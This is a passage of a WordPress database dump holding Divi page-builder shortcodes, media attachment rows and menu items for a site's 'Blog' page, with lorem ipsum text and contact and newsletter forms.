button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-04 22:20:16','2020-07-04 22:20:16','',134,'https://52.66.212.87/2020/07/04/134-revision-v1/',0,'revision','',0),(194,1,'2020-07-06 15:48:27','2020-07-06 15:48:27','WhatTheHell? Thumbnail images','WTH-LOGIN','','inherit','open','closed','','wth-login','','','2020-07-06 15:49:02','2020-07-06 15:49:02','',0,'https://52.66.212.87/wp-content/uploads/2020/07/WTH-LOGIN.png',0,'attachment','image/png',0),(195,1,'2020-07-06 15:49:19','2020-07-06 15:49:19','https://52.66.212.87/wp-content/uploads/2020/07/cropped-WTH-LOGIN.png','cropped-WTH-LOGIN.png','','inherit','open','closed','','cropped-wth-login-png','','','2020-07-06 15:49:19','2020-07-06 15:49:19','',0,'https://52.66.212.87/wp-content/uploads/2020/07/cropped-WTH-LOGIN.png',0,'attachment','image/png',0),(205,1,'2020-07-06 16:41:44','2020-07-06 16:41:44','','home-office-04-1','','inherit','open','closed','','home-office-04-1','','','2020-07-06 16:41:44','2020-07-06 16:41:44','',0,'https://52.66.212.87/wp-content/uploads/2020/07/home-office-04-1.jpg',0,'attachment','image/jpeg',0),(211,1,'2020-07-06 16:52:18','2020-07-06 16:52:18','','Artboard','','inherit','open','closed','','artboard','','','2020-07-06 16:52:18','2020-07-06 16:52:18','',0,'https://52.66.212.87/wp-content/uploads/2020/07/Artboard.png',0,'attachment','image/png',0),(215,1,'2020-07-06 17:05:26','2020-07-06 17:05:26','','WhatElse!','','publish','closed','closed','','whatelse','','','2020-08-18 10:58:36','2020-08-18 10:58:36','',0,'https://52.66.212.87/2020/07/06/whatelse/',1,'nav_menu_item','',0),(216,1,'2020-07-06 17:05:26','2020-07-06 17:05:26','','Email App','','publish','closed','closed','','email-app','','','2020-08-18 10:58:36','2020-08-18 10:58:36','',0,'https://52.66.212.87/2020/07/06/email-app/',2,'nav_menu_item','',0),(217,1,'2020-07-06 17:05:26','2020-07-06 17:05:26','','Soco','','publish','closed','closed','','soco','','','2020-08-18 10:58:36','2020-08-18 10:58:36','',0,'https://52.66.212.87/2020/07/06/soco/',3,'nav_menu_item','',0),(221,1,'2020-07-06 17:17:46','2020-07-06 17:17:46','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our Blog</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Blog Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||70px|\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Blog Area\" _builder_version=\"3.25\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blog fullwidth=\"off\" posts_number=\"9\" show_categories=\"off\" _builder_version=\"3.0.94\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.2em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" meta_font=\"Montserrat||||\" meta_text_color=\"#949ba3\" pagination_font=\"Montserrat||||\" pagination_text_color=\"#747d88\" animation_style=\"fade\" border_width_all=\"1px\" border_color_all=\"#d8d8d8\" border_style_all=\"solid\" border_width_all_fullwidth=\"1px\" border_color_all_fullwidth=\"#d8d8d8\" border_style_all_fullwidth=\"solid\" box_shadow_style=\"preset1\" box_shadow_blur=\"24px\" box_shadow_color=\"rgba(53,55,64,0.1)\" use_border_color=\"on\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Subscription Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Subscription Area\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_signup mailchimp_list=\"MailChimp|03dac884f0\" name_field=\"on\" title=\"Join Our Newsletter\" description=\"<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum. Mauris euismod mattis consectetur. </span></p>\" _builder_version=\"3.23\" form_field_background_color=\"#ffffff\" form_field_text_color=\"#747d88\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"42px\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" background_layout=\"light\" animation_style=\"fade\" button_text_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum. Mauris euismod mattis consectetur. </span></p>[/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','BLOG','','publish','closed','closed','','blog','','','2020-07-06 17:17:51','2020-07-06 17:17:51','',0,'https://52.66.212.87/?page_id=221',0,'page','',0),(222,1,'2020-07-06 17:15:22','2020-07-06 17:15:22','<!-- wp:divi/placeholder /-->','BLOG','','inherit','closed','closed','','221-revision-v1','','','2020-07-06 17:15:22','2020-07-06 17:15:22','',221,'https://52.66.212.87/2020/07/06/221-revision-v1/',0,'revision','',0),(225,1,'2020-07-06 17:17:46','2020-07-06 17:17:46','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our Blog</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Blog Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||70px|\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Blog Area\" _builder_version=\"3.25\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blog fullwidth=\"off\" posts_number=\"9\" show_categories=\"off\" _builder_version=\"3.0.94\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.2em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" meta_font=\"Montserrat||||\" meta_text_color=\"#949ba3\" pagination_font=\"Montserrat||||\" pagination_text_color=\"#747d88\" animation_style=\"fade\" border_width_all=\"1px\" border_color_all=\"#d8d8d8\" border_style_all=\"solid\" border_width_all_fullwidth=\"1px\" border_color_all_fullwidth=\"#d8d8d8\" border_style_all_fullwidth=\"solid\" box_shadow_style=\"preset1\" box_shadow_blur=\"24px\" box_shadow_color=\"rgba(53,55,64,0.1)\" use_border_color=\"on\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Subscription Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Subscription Area\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_signup mailchimp_list=\"MailChimp|03dac884f0\" name_field=\"on\" title=\"Join Our Newsletter\" description=\"<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum. Mauris euismod mattis consectetur. </span></p>\" _builder_version=\"3.23\" form_field_background_color=\"#ffffff\" form_field_text_color=\"#747d88\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"42px\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" background_layout=\"light\" animation_style=\"fade\" button_text_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum. Mauris euismod mattis consectetur. </span></p>[/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" 